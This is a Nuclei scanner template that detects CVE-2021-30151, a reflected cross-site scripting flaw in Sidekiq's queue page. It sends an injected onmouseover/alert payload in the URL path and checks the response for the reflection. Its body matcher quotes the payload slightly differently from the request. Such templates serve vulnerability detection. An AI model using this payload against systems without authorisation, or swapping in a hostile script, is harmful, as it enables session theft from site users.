31 lines
762 B
YAML
31 lines
762 B
YAML
id: CVE-2021-30151
|
|
|
|
info:
|
|
name: CVE-2021-30151
|
|
author: DhiyaneshDk
|
|
severity: low
|
|
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used.
|
|
reference: |
|
|
- https://github.com/mperham/sidekiq/issues/4852
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
|
|
tags: cve,cve2021,xss,sidekiq
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"'
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "onmouseover=\"alert('nuclei')"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200 |